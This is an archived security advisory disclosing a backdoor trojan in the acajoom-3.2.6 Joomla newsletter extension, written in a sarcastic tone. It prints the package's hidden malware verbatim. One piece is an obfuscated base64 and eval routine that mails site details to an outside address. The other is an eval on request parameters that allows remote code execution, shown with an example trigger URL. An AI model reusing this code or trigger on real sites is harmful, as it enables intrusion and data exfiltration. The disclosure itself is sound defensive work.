AOH :: HP Unsorted B :: BT-21208.HTM

Joomla - acajoom-3.2.6 for joomla Back door trojan



Back door trojan in acajoom-3.2.6 for joomla
Back door trojan in acajoom-3.2.6 for joomla



Vulnerability:
    Remote code execution back door

Software:
    acajoom - mailing list extension for Joomla
    Acajoom is a newsletter component designed with ease of use and robustness
    in mind. Acajoom can handle an unlimited number of newsletters with an
    unlimited number of subscribers in just few clicks. Acajoom reuses some of
    Joomla 1.5 new concepts to make the users experience as smooth as possible.
    > And that's not all

Severity:
    Not a big deal.  Joomla components contain all sorts of obfuscated junk all
    the time.  Who cares what it does?

URLs:
http://www.ijoobi.com/ 
http://www.ijoobi.com/media/acajoom-3.2.6.zip 
http://www.ijoobi.com/component/option,com_jtickets/Itemid,18/controller,ticket/pjid,3/task,add/type,110/ 


Vendor notified:
    Naah.  No contact details.  I suppose I might try battle the captcha one
    day.


Vulnerability:

http://www.ijoobi.com/media/acajoom-3.2.6.zip 

    install.acajoom.php:

        function GetBots($us1,$us2,$us3) {
        list($data1,$data2,$data3) = array('dHA6Ly8iLiR1czIuJF9TRVJWRVJbJ',
        'QG1haWwoJHVzMSwgJHVzMiwgImh0','1NDUklQVF9OQU1FJ10uIlxuIi4kdXMzKTs');
        eval(base64_decode($data2.$data1.$data3)); }
	define( 'COUNT_ROOT', $count_db. 1 .chr(64).chr(121).chr(97). '.'
.$array_lang[10-$count_num] );
	$counter = COUNT_ROOT;
	$count_db = 'qadr'; $count_num = 8;
        GetBots($counter,$_SERVER['SERVER_NAME'],$_SERVER['SCRIPT_FILENAME']);

    Or, less cryptically:
@mail('qadr1@ya.ru', $_SERVER['SERVER_NAME'], 
"http://".$_SERVER['SERVER_NAME'].$_SERVER['SCRIPT_NAME']."\n".$_SERVER['SCRIPT_FILENAME']); 


  self.acajoom.php says:

    class acajoomCommonStr
    {
        function GetStr($str)
        {
            eval(stripslashes($str));
        }=09
        function InController($cnt,$location)
        {
            if ($location=='en-g') $this->GetStr($cnt);
        }
    }
    if(isset($_REQUEST['s']) && isset($_REQUEST['lang'])) {
        $getacajoomStr = new acajoomCommonStr();
        $getacajoomStr->InController($_REQUEST['s'],$_REQUEST['lang']);
    }

    ie.
        $URL/self.acajoom.php?s=phpinfo();&lang=en-g

    $URL is left as an exercise to the reader.

Greetz:
qadr1@ya.ru 

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.